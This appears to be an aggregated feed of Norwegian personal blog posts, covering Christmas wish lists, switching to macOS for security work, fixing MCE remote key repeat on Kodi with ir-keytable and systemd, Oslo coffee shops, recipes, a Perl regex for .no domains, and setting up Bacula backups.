Vinterens første snøfall kom i morgentimene i dag, og da innså jeg at det var på tide å få snekret sammen årets julegaveønskeliste. Jeg noterer meg at det ikke har kommet noen blogg-innlegg siden sist jul, det er andre gang dette har skjedd. Dette til tross for at det har skjedd ganske mye i 2020, for eksempel har jeg flyttet!

Som alltid, det kan hende jeg sniker inn noen nye ting på listen hvis jeg kommer på noe mer.

• IR-termometer (måler temperatur på overflater med IR)
• Loddestasjon
• Ubiquiti Unifi USW Flex Mini
• Magnet-sensor for dør (Som snakker Z-Wave)
• Canon Selphy CP1300 fotoskriver
• Fargelaser-skriver (ingen preferanse på modell, men må ha nettverksmulighet)
• Kantklipper
• Plenrive
• Hageslange
• Postkasse
• Whisky (single malt)
• Vin (fikk to!)
• En kul t-skjorte (str. M)
• Et barskap, gjerne med plass til vinskapet jeg har fra før
• En god bok
• En god sigar til nyttårsaften
• En god lommekniv, gjerne egnet for mekking på PC
• Originale NES-spill
• Originale GameBoy-spill
• Sokker (gjerne ull, str. 44) (fikk to!)
• Greenscreen (eksempel)
• Musikk på vinyl (her kan du sjekke hva jeg har fra før)
• En klem ❤

For a really long time (Since Slackware Linux 8), Linux has been my daily driver both personally and professionally. I ran Linux on my workstation and laptop for work, studies and productivity up until 2017 and dual-booting with windows after that. I have been using quite a variaty of distros over the years, ending up with Fedora/CentOS as my favorites. Since 2017, I have gradually been switching to Apple and Microsoft as my main driver for productivity and work. This blog-post is about why this happened and 5 reasons why I ended up with Apple and not Windows as my workhorse when I got a new laptop recently.

Background

For professional use, I have been using linux as my main workhorse for both desktop and server workloads and will continue to do so on servers. On the desktop side I have switched to a more mainstream desktop operating systems as my daily driver. So what has changed?

In 2016 Gjøvik University College where I worked got merged with Norwegian University of Science and Technology (NTNU). In the IT-department where I work now there are 200+ employees distributed over many physical locations in Norway. This provides a whole set of problems regarding collaboration. In my job as the head of SOC, I have to keep in touch with a lot of different people both inside and outside of the university and IT-department. NTNU has like many other universities and companies standardised on Microsoft Office 365, Skype and Zoom and I must admit that the linux experience has not been great, even though you can get by with a web-browser for some tasks. Collaboration is the main reason why I gradually shifted towards a more mainstream desktop OS.

Working with security analytics, detection and incident response I often need to some extent to do research and development, security engineering, security analytics and digital forensics related tasks which can be resource intensive.  As a security professional in a large poly-technical university, where students and staff use all major (and minor) versions of almost all desktop operating systems, you have to be comfortable and up to date with how systems are developing over time and being able to detect, respond and do forensics on common desktop and server systems in use like Windows, macOS and Linux. This means that I have to have all these systems at my disposal. To manage this, I used to have a ThinkPad X1 Carbon 6th (Windows 10), an dual core MacBook Pro 13" (2017)  and a Xeon based Dell Precision workstation (CentOS 7) at the office. Because I mostly did the heavy lifting on my workstation and office related tasks on laptops, the MBP13 and X1C was underpowered in regards to security analysis and forensic tasks. Meaning that I had to remote back to my workstation for some tasks when I was on the road which was time consuming.

Consolidating workstations and laptops into one

When my workstation was done for and ready to be switched out recently, I felt the  need to consolidate around the balance of mobility and power. I decided that analytical workloads that cannot run on a high-end laptop should probably run on the vSphere cluster instead of a workstation anyway. This is when I decided to replace my workstation with a laptop. The main reason for this is mobility off course, because I want to be able to do get work done anywhere and anytime regardless of it being a online meetings in a project, confirming a vulnerability in a virtual machine or searching for hashes in a disk image. Since I am most productive doing analytics, development and engineering tasks when I am working in a Unix/Linux envionment, this was an important factor for my choice. Linux was out of the question because if all the overhead regarding collaboration, so the choice was between a decent Windows 10 laptop like Lenovo ThinkPad X1 Extreme, ThinkPad P1, Dell XPS 15  and a MacBook Pro 16". The choice landed on the Apple MacBook Pro 16" running macOS Catalina.

5 reasons why I chose macOS:

1. macOS is a certified Unix-03 operating system with a familiar POSIX-compliant environment with decent terminal emulators available (iTerm), has a strong security and privacy model and has a quite alright and fuctional graphical user interface (when you get used to it). A lot of the software I use/need are only supported on *nix like environments and can be a hazzle to get working properly on Windows.
2. macOS run most of the office and productivity tools that I need. It has acceptable support for the Microsoft Office 365 and can open AIP protected documents and it supports Dropbox, Box and OneDrive.
3. macOS can run both Docker and VMware Fusion Pro on the same machine and supports all major OS including macOS to run as VMs without a problem.
4. Brew (Package manager) can install most software packages I need  by terminal in a famliliar way like yum/dnf/apt on Linux systems, making it easier to set up a development and analysis environment.
5. Apple provides good quality hardware (Especially with the new keyboard) and really good power to mobility ratio with the MacBook Pro 16. The integrations with other Apple devices in the ecosystem has increased my productivity and workflow and I really like using sidecar between the Mac and iPad as a second monitor when I´m travelling.

Some of the reasons above is also available on Windows 10, so by looking at them isolated was not a good reason to exclude the Windows 10 on a ThinkPad choise. Thats why I included 5 reasons why I did not chose Windows below.

5 reasons why I did not chose Windows 10:

1. It is not possible to run both Microsoft Hyper-V and VMware workstation (or any other desktop virtualisation) together on the same machine. I need VMware Workstation for many advanced tasks like research, labs and analysis of unknown binaries. I tried to implement my workflows into Hyper-V, but it was just not an productive user experience.
2. Windows Subsystem for Linux (WSL) is great and I love it, but it has some performace and compability isses, especially when it comes to more advanced networking, development and analytical tasks that I prefer doing in a linux terminal (WSL 2 resolves this, but it requires Hyper-V installed, hence reason 1).
3. The PGP encryption software and integrations available for Windows 10 (Outlook) are unstable at best and I feel that it never really worked as exptected. I need to be able to send and receive encrypted email in both S/MIME and PGP. I could off course use Thunderbird with Enigmail, but then yet another application for email and calendar. Also I have experienced problems with thunderbird email and calendar sync with exchange in the past.
4. Docker for Windows need Hyper-V and cannot be installed on the same machine as VMware Workstation. Docker is quite neet for temporary running applications like CyberChef for converting data into different formats locally. The docker problem could be solved with a VM in VMware workstation, but reason 1 and 2 still applies.
5. Sofware that require Windows is easily available for me from Windows Remote Desktop services, remote applications and software that require macOS isnt.

Hvis denne trenden med publiseringsdato for julegaveønsker fortsetter, så vil lista bli publisert etter julaften i 2023. Dette viser nyere forskning:

Det er egentlig bare én ny ting på lista for i år, for jeg har ikke hatt tid til å gruble så mye. Så sjekk innom igjen senere, kanskje jeg har kommet på noe mer lurt.

Hvis det ser helt håpløst ut så kan du alltids gi til en av disse glimrende organisasjonene i stedet: Røde Kors, Leger uten grenser, Amnesty International, Plan Norge.

• En middels romslig verktøykasse (den jeg har nå er en tanke for liten)
• Stiftepistol
• Magnet-sensor for dør (Som snakker Z-Wave)
• Øre-termometer
• reMarkable-stylus i metall
• Sånn der avstandsmåler som bruker laser
• TP-link TL-SG105E switch
• Whisky (single malt)
• Vin
• En kul t-skjorte (str. M)
• Et barskap, gjerne med plass til vinskapet jeg har fra før
• En god bok
• En god sigar til nyttårsaften
• En god lommekniv, gjerne egnet for mekking på PC
• Originale NES-spill
• Originale GameBoy-spill
• Sokker (gjerne ull, str. 44)
• Greenscreen (eksempel)
• Musikk på vinyl (her kan du sjekke hva jeg har fra før)
• Noe fint til katta
• En klem ❤

Or: make your MCE remote work properly again on Kodi after upgrading to Ubuntu 18.04. No LIRC required.

Ever since I upgraded my Kodi box to Ubuntu 18.04, I’ve been having issues with my beloved remote control, the MCE remote from Microsoft. (I’ve had it for years, I have perfect muscle memory for all the buttons. All the most important buttons are within thumb reach.)

First, it wouldn’t work at all, and after some frustrating hours of problem shooting I got it sort-of, kind-of working, but it started repeating button presses, ignoring some buttons and generally being pretty useless. I eventually gave up on using the original IR receiver, and found that if I used a third party IR receiver acting like a HID device, I could tweak the keyboard bindings in Kodi to make it more or less feature complete.

That only left me with one annoyance: some buttons would register double presses. Worse, the all important «OK» button was one of them. Whenever I was navigating through my media, the double click would randomly start a movie I didn’t mean to, go to a season I didn’t intend etc. Changing options was also a big hassle, whenever I tried to toggle subtitles, they would generally un-toggle immediately.

I’ve been living with this for more than a year now, when I finally snapped and started looking into it again. I found I’m not the only one with this issue, as this blog post and this forum thread can attest. To summarize, my setup is currently this:

• I have an MCE remote, as pictured
• I’m not using the USB IR-receiver that came with the remote, I’m using a third party receiver that is being recognized by evdev as a HOLTEK sensor, and by lsusb as a Belkin device (1241:e000)
• I’m not using LIRC at all

So, let’s get to the solution.

The Solution

The solution is deceptively simple, even trivial, once you know how.

First of all, you a couple of tools:

$ sudo apt-get install evtest ir-keytable

Using evtest, try to figure out which input device is the one that corresponds to your IR receiver. Some trial and error may be needed, but some devices are obviously not the correct one, such as «HDA Intel PCH Line Out», «Logitech BT Mini-Receiver» etc. Pick a device that looks promising, then start pressing some buttons on the remote. You know you have the right device when you see lots of lines getting printed.

Here’s a transcript of a successful run (with a bunch of irrelevant lines snipped out):

Input driver version is 1.0.1
Input device ID: bus 0x3 vendor 0x1241 product 0xe000 version 0x110
Input device name: "HOLTEK"
Supported events:
  Event type 0 (EV_SYN)
*SNIP*
Key repeat handling:
  Repeat type 20 (EV_REP)
    Repeat code 0 (REP_DELAY)
      Value    250
    Repeat code 1 (REP_PERIOD)
      Value     33
Properties:
Testing … (interrupt to exit)
Event: time 1564611021.168933, type 4 (EV_MSC), code 4 (MSC_SCAN), value 70028
Event: time 1564611021.168933, type 1 (EV_KEY), code 28 (KEY_ENTER), value 1
Event: time 1564611021.168933, -------------- SYN_REPORT ------------
Event: time 1564611021.428026, type 1 (EV_KEY), code 28 (KEY_ENTER), value 2
Event: time 1564611021.428026, -------------- SYN_REPORT ------------
Event: time 1564611021.468030, type 1 (EV_KEY), code 28 (KEY_ENTER), value 2
Event: time 1564611021.468030, -------------- SYN_REPORT ------------
Event: time 1564611021.508025, type 1 (EV_KEY), code 28 (KEY_ENTER), value 2
Event: time 1564611021.508025, -------------- SYN_REPORT ------------
Event: time 1564611021.548028, type 1 (EV_KEY), code 28 (KEY_ENTER), value 2
Event: time 1564611021.548028, -------------- SYN_REPORT ------------
Event: time 1564611021.588024, type 1 (EV_KEY), code 28 (KEY_ENTER), value 2
Event: time 1564611021.588024, -------------- SYN_REPORT ------------
Event: time 1564611021.608926, type 4 (EV_MSC), code 4 (MSC_SCAN), value 70028
Event: time 1564611021.608926, type 1 (EV_KEY), code 28 (KEY_ENTER), value 0
Event: time 1564611021.608926, -------------- SYN_REPORT ------------

A few things to note: REP_DELAY is set to 250, REP_PERIOD is set to 33. Also, we get multiple lines of the event type 1 (EV_KEY), code 28 (KEY_ENTER), value 2, this is all from the «OK» button being pressed briefly once. We can see that they all got fired within roughly 0.04 seconds of each other, or 40 milliseconds. That’s awfully close to the value of 33 for the period. The first event, with value 1, is fired 259 ms before the events with value 2. Again, that corresponds to the delay value of 250. This all happened within roughly 440 ms, less than half a second.

So how can we tweak the values for REP_DELAY and REP_PERIOD? I found the answer over on the MythTV wiki. The wiki also explains why we’re having issues: IR baud rates are slower than a typical keyboard, wired or wireless. It also suggests the values 500 and 250, so let’s apply that.

In my example, I found the receiver on device 3, so the command ends up looking like this:

$ sudo ir-keytable -D 500 -P 250 -d /dev/input/event3

Now, when I re-run the evtest command on my device, I get the following result when pressing the OK button:

Event: time 1564612895.905914, type 4 (EV_MSC), code 4 (MSC_SCAN), value 70028
Event: time 1564612895.905914, type 1 (EV_KEY), code 28 (KEY_ENTER), value 1
Event: time 1564612895.905914, -------------- SYN_REPORT ------------
Event: time 1564612896.409903, type 4 (EV_MSC), code 4 (MSC_SCAN), value 70028
Event: time 1564612896.409903, type 1 (EV_KEY), code 28 (KEY_ENTER), value 0
Event: time 1564612896.409903, -------------- SYN_REPORT ------------

That’s more like it! We get one instance of value 1 (key down), no instances of value 2 (key still down, repeating the key), and one instance of value 0 (key up). This time, the key press even lasted slightly more than 500 ms without issue. Success!

Side note: this is kinda, sorta, maybe a form of key debouncing. Just throwing that into this blog post for the search engines out there. I know I tried to use that as a keyword while researching this issue.

Making it stick

The tweaked values will get lost upon the next reboot, so how can we make the fix permanent? In the old days, you would put it in /etc/rc.local, but this is 2019, let’s use systemd! This is what the oneshot service was made for.

I created the file /etc/systemd/system/ir-keytable.service with the following contents (remember to tweak the command on the ExecStart line to suit your setup):

[Unit]
Description=Adjust delay and period for IR remote

[Service]
Type=oneshot
ExecStart=/usr/bin/ir-keytable -D 500 -P 250 -d /dev/input/event3
RemainAfterExit=yes

[Install]
WantedBy=multi-user.target

Then reload systemd and enable the service:

$ sudo systemctl daemon-reload
$ sudo systemctl enable ir-keytable.service

Phew. I hope all that can come in handy for someone else out there.

Som frilanser med utpreget behov for å se folk ofte, er kaffesjapper det beste (og billigste) kontoret for meg. Her er mine go-to-steder i Oslo.

Felles for alle er at de har god plass, god kaffe og ikke for mange distraksjoner. Merk at sistnevnte er helt subjektivt; jeg har kanskje høyere terskel for å bli plaget av gjestetrafikk enn du har.

1. PUST

   

   En ikke altfor mye omtalt perle på Majorstuen rett ved T-banen. Übertrendy lokale, men nedpå stemning. Hyggelig betjening som ikke forstyrrer deg.

   Av kaffe har de alt du trenger; også V60 hvis du er den typen (jeg er det litt). De har også mat, og ikke bare bakevarer, men også glutenfritt og morsomme drikker som kombucha.

   PUST har også gratis og sikret nett, alltid et pluss. Strøm er stort sett ikke noe problem. Det beste er den store plassen, og følelsen av å være et stille sted selv i et travelt område av Oslo. En del studenter, ettersom det er i nærheten av Blindern.

   Minus er at det er dyrt, 36 kroner for dagens kaffe. Har kun frokost og lunsj, og stenger klokka 17.00 på hverdager.

   

2. Skatten

   Tidligere Nord og Natt på Tøyen. Jeg liker de stedene som ligger lett tilgjengelig; også denne ligger rett på T-banestasjonen.

   Det beste her er at de har et område innerst som er mer skjermet og uten vinduer, hvis du skulle trenge ekstra fokus. Ellers kan du sitte ved vinduet og smugkikke på folk som haster til og fra banen, jeg synes ofte det er litt gøy. De har også flere båser med sofa, som er kjekt for samarbeid. Strøm finnes overalt.

   De har både frokost, lunsj og middag, og er åpent fra tidlig til seint, men blir utested på kvelden. SUPERbusy i helgene, så dette er definitivt et hverdagskontor.

3. Kulturhuset

   

   Det største kontoret Oslo har å by på. Ligger på Youngstorget og er stort sett travelt. Jeg liker det likevel fordi det har flere etasjer, føles ikke forstyrrende – selv i helgene – og man kan sitte uforstyrret lenge.

   Fungerer godt for samarbeid og alenejobbing, med både båser og enkeltbord med sofa. Gratis og sikret nett = tommel opp.

   Godt utvalg av frokost og lunsjvennlig mat. De har for eksempel VELDIG god falafeltallerken, jeg bare sier det. Blir forøvrig et ekstremt populært utested på kveldene. Dyrt er det også, men det er det stort sett overalt i Oslo.
   

4. Stockfleths Prinsens gate

   Min favorittkaffekjede i Oslo, og fortsatt den største filialen. To etasjer, hvor underetasjen er et hipstermekka i den forstand at interiøret ikke finnes nyere enn 1980 (øyeestimat). Jeg lever fint med det. Musikken som spilles er alltid bra, her kan jeg faktisk finne på å droppe ørepluggene.

   Bra sted for møter og samarbeid. Jobbet her mye da jeg var student rett ved siden av, og stedet har fortsatt mange gruppearbeidende studenter som klientell.

   Godt V60-utvalg. Ganske travelt, så kom tidlig. Ikke alltid strøm tilgjengelig, så hit kommer du ikke for de lengste øktene. Har matutvalg som en kafé, men også glutenfrie alternativ. Stenger 17.00.

   

Ps. Bare for å illustrere hvor mye kaffe er en del av min hverdag; her er en tekst fra da jeg prøvde – PRØVDE – å slutte.

Skrevet i 2016 for NXTA2N, som jeg jobbet for da.

Godt innhold kan drive både mer trafikk og mer salg til bedriften din på nett. Slik kommer du i gang.

Nettsiden deres skal naturligvis beskrive bedriften og hva den kan hjelpe kundene med, men gode artikler, inspirerende bilder eller video viser enda bedre hva dere kan. Derfor kan det være en god idé å opprette et eget område for publisering av innhold, for eksempel en blogg eller Instagram-konto.

Tallene viser at stadig flere internettbrukere i dag er interessert i relevant innhold fra eksperter fremfor å se annonser på nettsidene de besøker. I slutten av 2015 hadde 23 prosent av Norges internettbrukere installert annonseblokkering på sine datamaskiner (TNS Gallup, 2016). Det betyr at det er mye å hente på å investere i nyttig informasjon i tillegg til reklame.

Slik lager du godt innhold

Det trenger ikke være vanskelig, men du må huske disse tre tingene:

1. Skriv innhold som er relevant for din bedrift.

2. Skriv godt.

3. Sørg for at det du har skrevet er lett å finne.

Innholdet skal gjenspeile bedriftens ekspertise for potensielle kunder og ikke minst forsikre eksisterende kunder om at de har tatt rett valg. Informasjonen skal fremfor alt være riktig, og all tekst skal være skrevet grammatisk korrekt. Ingenting sier «uprofesjonell aktør» som en tekst full av skrivefeil. Bruk derfor mye tid på språkvask, det vil lønne seg. Henvis gjerne til statistikk eller kilder der det er aktuelt, slik at du får enda mer faglig tyngde i artikler om krevende tema.

Hva er dine kunder interessert i å lese om?

Dette er det første spørsmålet du bør stille deg. Er du en butikk som selger hageredskaper, er sannsynligheten stor for at kundene dine leter etter artikler om hagestell på nettet. Da er det lurt å være den aktøren som tilbyr slik informasjon. Flere bedrifter opplever at inspirasjonsblogger tiltrekker seg riktig målgruppe, gir dem nyttig innhold og så klart et påskudd til å handle varer i butikken. Interiør, hagearbeid, matlaging og håndarbeid er bare noen av områdene man kan velge.

Noen eksempler:

Jernias blogg

Norgesglasset på Instagram

Kremmerhuset på Instagram

Plantasjens inspirasjonsblogg

Maxbos inspirasjonsblogg

Hvor befinner potensielle kunder seg?

Det hjelper ikke å lage godt innhold hvis ingen finner det. Når du er klar for å publisere innholdet må du vite hvor du skal dele det. Analyseverktøy og statistikk kan fortelle deg hvor det er lurt å legge innsatsen. Noen vil oppleve at deres målgruppe er svært aktive på Facebook eller Instagram, mens andre bør fokusere mer på synlighet i søk. Det avhenger også av hvilken type innhold du har valgt å produsere. Visuelt innhold bør deles i kanaler som er tilpasset dette, for eksempel Instagram og Pinterest. Tekstbasert innhold bør deles på Facebook eller blogg.

Annonsere eller ikke annonsere?

Du kan betale for eksponering i tillegg til å spre innholdet organisk. Selv om du har optimalisert teksten din til Googles preferanser kan det være vanskelig å konkurrere med større aktører om populære tema. Da kan du annonsere på søkeresultater, eller betale for å nå din målgruppe på sosiale medier som Facebook.

Leie inn noen eller skrive selv?

Du kan velge å betale en ekspert for å lage innholdet du ønsker å publisere, du må bare vite hva du ønsker å oppnå. Vær tydelig om dine visjoner, hvem du ønsker å nå, og hvor mye du vil investere av tid og penger på prosjektet. Innholdsprodusenter vet hvordan man skal presentere et tema for spesifikke målgrupper, og hvordan man gjør innhold lett tilgjengelig.

Kort oppsummert

Godt innhold viser hva bedriften kan og gir gode relasjoner til merkevaren. Det kan lønne seg å bruke tid på å produsere og spre inspirerende innhold for å tiltrekke seg potensielle kunder.

Trenger du litt hjelp?

Jeg er tekstforfatter og markedsfører med lang erfaring i å nå ut til riktig målgruppe. Jeg brenner for godt innhold, og å snakke med riktig språk til målgruppen. Ta kontakt for en uforpliktende prat!

As all my years as a student has finally ended, quite a while ago actually. I have decided to give blogging another try. I have not decided on the format, content and language yet, but it will probably be related to my hobbies and thoughts about technology, cyber security, big data, programming, data analytics and other things I find interesting and want to share with the rest of the world. I am considering to write in my native language Norwegian because there are not really that many good blogs about cyber security and technology in Norwegian. I will probably keep writing in english as I saw some of my posts on my old blog found their ways into reference lists etc.

Anyways, stay tunes.

Cheers,

Christoffer¨

As all my years as a student has finally ended, quite a while ago actually. I have decided to give blogging another try. I have not decided on the format, content and language yet, but it will probably be related to my hobbies and thoughts about technology, cyber security, big data, programming, data analytics and other things I find interesting and want to share with the rest of the world. I am considering to write in my native language Norwegian because there are not really that many good blogs about cyber security and technology in Norwegian. I will probably keep writing in english as I saw some of my posts on my old blog found their ways into reference lists etc.

Anyways, stay tunes.

Cheers,

Christoffer¨

Hei, hå, nå er det julegaveønsker igjen. Jeg ser jeg er to uker senere ute enn foregående år, jeg får skylde på alderen.

Som alltid: Det kan godt hende jeg kommer på noe lurt litt senere, så det er bare å sveipe innom hvis du er opprådd for noe å finne på.

• Canon EVF-DC2 (i sølv)
• RØDE VideoMic GO
• En middels romslig verktøykasse (den jeg har nå er en tanke for liten)
• Stiftepistol
• Sånn der avstandsmåler som bruker laser
• IKEA TRÅDFRI Adapter
• TP-link TL-SG105E
• Whisky (single malt)
• Vin
• Kul t-skjorte (str. M)
• Et barskap, gjerne med plass til vinskapet jeg har fra før
• En god bok
• En god sigar til nyttårsaften
• Giljotin til sigarer (sånn kniv du kutter av enden med)
• En god lommekniv, gjerne egnet for mekking på PC
• Originale NES-spill
• Originale GameBoy-spill
• Sokker (gjerne ull, str. 44)
• Greenscreen (eksempel)
  
• Musikk på vinyl (her kan du sjekke hva jeg har fra før)
• Noe å oppbevare min meget moderate platesamling i
  
• Noe fint til katta
• En klem ❤

Ingredienser:

• 1 kg oksehaler
• 2 gulerøtter
• 1 løk
• 2 fedd hvitløk
• 1 stilk stangselleri
• 1 liten bunt timian
• 1 laurbærblad

Fremgangsmåte:

Sett stekeovnen på 130 grader. Brun oksehalene og grønnsakene i smør eller en nøytral olje. Legg alle ingrediensene i en ildfast gryte og fyll på med vann så det dekker alt. Gi gryten et et oppkok og sett i stekeovnen. Oksehalene er ferdig etter ca. 4 timer.

Velsmakende og saftig gulrotkake uten egg og melk. Oppskrift og illustrasjon lånt fra Det søte liv

Ingredienser:

• 600 g hvetemel
• 450 g sukker
• 2 ss kanel
• 2 ss kardemomme
• 2 ts bakepulver
• 2 ts natron
• 1 ts salt
• 3 dl vann
• 3 dl olje
• 2 ts eddik
• 400 g gulrot (renset vekt)

Ostekrem:

• 200 g kremost (se tips for vegansk alternativ)
• 150 g smør (se tips for vegansk alternativ)
• 500 g melis
• 1 ts vaniljeekstrakt

Pynt:

• 1 granateple
• 50 g mandler

Fremgangsmåte:

Bland mel, sukker, krydder, bakepulver, natron og salt i en stor rørebolle.

I en annen bolle blandes vann, olje og eddik. Ha det våte i det tørre og rør til en fast, jevn deig.

Riv gulrøttene fint og bland inn i deigen til slutt.

Hell deigen i en liten, bakepapirkledd langpanne (ca 20×30 cm). Stek kaken midt i ovnen ved 175°C i ca. 30 minutter, eller til kaken er gjennomstekt. Avkjøl kaken i formen til den er kald.

Dagens eksperiment var et stykke marinert kalkunbryst. Kalkun har en lei tendens til å bli tørt, derfor prøver jeg å tilberede den med Sous Vide.

Kjøttstykket jeg valgte var 7-8 cm tykt. Etter 5 timer på 61 grader ble kalkunen både mør og saftig!

60 grader i 7-8 timer. Resultatet ble veldig bra.

For my project to find as many .no domains as possible, I needed a regexp for extracting valid domains. This task is made more fun by the inclusion of Norwegian and Sami characters in the set of valid characters.

In addition to [a-z0-9\-], valid dot-no domains can contain the Norwegian æ (ae), ø (o with stroke) and å (a with ring above) (Stargate, anyone?) and a number of Sami characters. ŧ (t with stroke), ç (c with cedilla) and ŋ (simply called “eng”) are some of my favourites.

The following code will print only the first match per line, and uses ŧ directly in the regexp.

1
2

echo "fooŧ.no baŧ.no" | perl -ne 'if(/([a-zŧ]{2,63}\.no)/ig) { print $1,"\n"; }'
fooŧ.no

If we replace if with while we will print any match found in the whole line.

1
2
3

echo "fooŧ.no baŧ.no" | perl -ne 'while(/([a-zŧ]{2,63}\.no)/ig) { print $1,"\n"; }'
fooŧ.no
baŧ.no

Because I’m afraid the regexp (specifically the non-ASCII characters) may be mangled by being saved and moved between systems, I want to write the Norwegian and Sami characters using their Unicode code points. Perl has support for this using \x{<number>} (see perl unicode)

1
2
3

echo "fooŧ.no baŧ.no" | perl -CSD -ne 'while(/([a-z\x{167}]{2,63}\.no)/ig) { print $1,"\n"; }'
fooŧ.no
baŧ.no

When using code points, I have to specify -CSD for the matching to work. I am not really sure why this is required. If you can explain, please comment or tell my by other means. As you can read in perlrun, -CSD specifies that STDIN, STDOUT, STDERR and all input and output streams should be treated as being UTF-8.

Another problem is that if this last solution is is fed invalid UTF-8, it will die fatally and stop processing input.

1

Malformed UTF-8 character (fatal) at -e line 1, <> line X.

To prevent this happening I currently sanitize my dirty input using iconv -f utf-8 -t utf-8 -c. If you have a better solution for this, Perl or otherwise, please tell me!.

A simple regexp would match the valid characters for a length between 2 and 63 followed by .no. However, I wanted only and all “domains under .no” as counted by Norid in their statistics. Norids definition of “domains under .no” are all the domains directly under .no, but also domains under category domains i.e. ohv.oslo.no and ola.priv.no. To get comparable results, I have to collect both *.no and *.<category domain>.no domains when scraping data.

The resulting “oneliner” I use is this…. It once was a oneliner, but with more than 10k characters in the regexp it was hard to manage. The resulting script builds up a regexp that is valid for all Norwegian domains using a list of valid category domains, all valid characters and other rules for .no domains.

Now that I have finished with my bachelor in computer science and realised that I will not be finishing my masters degree in information security I want to sell most of the books I have bought over the years. Most of these books are curriculum for the masters in information security and I will add books for the bachelors in computer science when I get around to it.

I will be selling these books through the Facebook group Bytte/selge for oss Studenter i Gjøvik, email and whichever way people get a hold of me. Whenever I sell a book or the book is reserved for someone, I will put a line over the book so that it is possible to know at any time which books are still available to buy. All prices are in NOK.

Books that are being or has been sold

Contact information

Send me an email at hamartin@moshwire.com and tell me which books you wish to buy or look at before deciding to buy. All books are currently in my office at GUC, K building, IT-Tjenesten.

Cheers,
Hans

Now that I have finished with my bachelor in computer science and realised that I will not be finishing my masters degree in information security I want to sell most of the books I have bought over the years.

I will be selling these books through the Facebook group Bytte/selge for oss Studenter i Gjøvik, email and whichever way people get a hold of me. Whenever I sell a book or the book is reserved for someone, I will put a line over the book so that it is possible to know at any time which books are still available to buy. All prices are in NOK.

Books that are being or has been sold

Contact information

Send me an email at hamartin@moshwire.com and tell me which books you wish to buy or look at before deciding to buy. All books are currently in my office at GUC, K building, IT-Tjenesten.

Cheers,
Hans

This post will be quite short, simply because my conclusion after implementing and testing two of the tools mentioned earlier in this post on a test server are quite different from what I imagined them to be. After testing both SpamAssassin and Amavisd-new I realized that these tools are not meant to be installed and forgotten to the same degree as the other tools I am using, they are meant to be used actively by the administrator to continually improve results by tweaking settings and inspecting the output.

Since my goal is to have a setup that primarily work for me and I wish to fiddle as little as possible with it, these two tools are simply to time demanding and the improved spam checking simply isn’t worth the extra time spent. For this reason I have simply let my server be as it was before I started this mini project and instead chose to teach those few users I have that on my server, some spam is to be expected and spent some time teaching them to recognize spam instead so that they could either just delete them manually or tell their client that it is spam and let that handle it instead.

So, there you have it. The conclusion is that if you have a personal email server and you don’t wish to fiddle with it all day long, accept the fact that there will be some spam ending up in your users email boxes and teach them to recognize and delete these few instead. This does not mean that there is no value in installing these tools, but personally I feel that it makes more sense if there is a larger user base or you have a lot higher goals than what the simpler tried and tested tools are giving you.

Contact

I am still very interested in discovering and getting to know good tools and services plus tips and tricks to improve reporting and reducing the amount of spam on my server. Even those meant for production use in business environments. If I don’t want to use them on my own server, I still administrate other servers which these tools can be appropriate to be used on. So send me an email with your suggestion and I will take a look at it and report it here on the blog.

Send me an email at hamartin@moshwire.com and make my day.

Cheers,
Hans

I have a some servers running different services and would like to have backups of those servers I deem most important. Since I have minimal experience with Bacula and I have to administrate backups for a few servers at work, I decided I could write about how I set it up and how to use that setup plus configure clients. At the start of writing this, I have not put a lot of thought into anything other than that I wish to use Bacula and that there should be a weekly complete backup and daily incremental backups of each host. Ill try to be thorough as I write this and explain my choices as I get further into this project. One of my colleagues have already made a similar post (this one) which I am using as my initial source to learn and then I will expand on it as I go.

For the purpose of this writing I have decided to take backups of two servers and store the backups on my NAS which is simply a dedicated server with a lot of storage space in it. How I do exactly that I will have to find out as I get to understand how this work. Since my servers are in production seen from my point of view, I have created a set of virtual machines to do initial trial and error testing of Bacula before installing and configuring it on the actual servers.

Halfway into learning about Bacula, I learned that Bacula is designed primarily to work with tape drives or storage types that are interchangeable so that in theory, there is unlimited amounts of storage. My setup will be based on a fixed amount of storage space, meaning the size of my NAS and I will try to the best of my understanding make the setup work within those confinements.

While explaining the configuration I will not explain settings I deem to be self explanatory. In the case that the settings I did not explain are not self explanatory for you, the documentation found on Bacula’s home pages are comprehensive, interesting and informative.

Introduction

Bacula is a client/server system designed to be scalable, meaning that it is divided into several parts where each part has its purpose. Depending on the size and throughput of your server park, these different parts can be deployed on different servers to better handle large amounts of data, I/O, CPU time, databases, etc.

The different components of Bacula

Bacula is built up of 5 different components. The console, file server, catalog, storage and the director where the catalog is more of a conceptual component than an actual component in itself.

Console

The console is an interface to all the other parts of Bacula and it works by communicating with the director. Bacula comes with console software, but any software designed to communicate with the director can be used and there are several options out there. The purpose of the console is to manage the system, not to configure it. Using the console, it is possible to see and manage already made backups plus schedule extra backups when needed and restore distinct files or whole systems. Depending on what kind of hardware you have, it can also be used to tell Bacula that tapes has been swapped, name them, etc.

File server

This is the component you install on the client. The director will contact the file server and tell the client to start backing up data, transfer it or start receiving data for a restore. This component has nothing to do with what is to be backed up or restored. Its only responsibility is to copy data and record meta data for whatever it has been told to take a backup of and transfer it to the server or receive data from the server and store them on the client itself.

Catalog

The catalog will keep a complete index of files, folders, time data plus information about prior and subsequent backups. The meta data itself is stored in an SQL database by default and can be installed on a separate host to support scalability in the system. The catalog in itself is not a component like the others, but a concept of where the meta data for the system/backups are stored. This means that if there is support for it, the catalog can be a flat structure on file, databases, etc.

Storage

The storage component does the actual saving of data to physical media, it being file systems, tape storage, CD-ROMs and a wide set of different storage systems. This component can be hosted on separate servers since all communication with the rest of the Bacula system is done using TCP/IP. For large server parks, the amount of data this component has to handle can be to much for one host to handle, so it is possible to have several storage servers being controlled by one director. What is important to understand here is that the storage daemon handles hardware and understands how to use that hardware in different situations.

Director

The director is central to everything that is done within the system and sews all the other components together. Using the static configuration and individual client configurations, the director will schedule backup jobs, restore jobs and relay whatever the console component is asking for. This description of the director is at best based on poor understanding of the director. It will be updated when or if this understanding becomes better.

My setup

My backup needs at this moment in time make Bacula overkill, but since I want to learn, I still choose to use it. Knowing that the different components can be deployed on individual hosts or all on the same I choose to install the director, console and storage component on the backup server, the file servers on the clients being backed up and the catalog on an already set up database server on my local network.

The backup and database server are physical machines with access to storage space on a NAS, they run Debian stable, version 7.7. The clients are two virtual machines also running Debian stable 7.7. I might, for the purpose of learning myself, add my personal Windows 7 computer to be backed up in addition just to see what the difference in setup is.

Installing the basic components on the server

On the NAS, I make sure that its updated before installing the needed components for Bacula on this host. When dbconfig-common asked to automatically configure the SQL configuration, I chose no. I’ll configure the catalog later since there is no local database server to automatically configure.

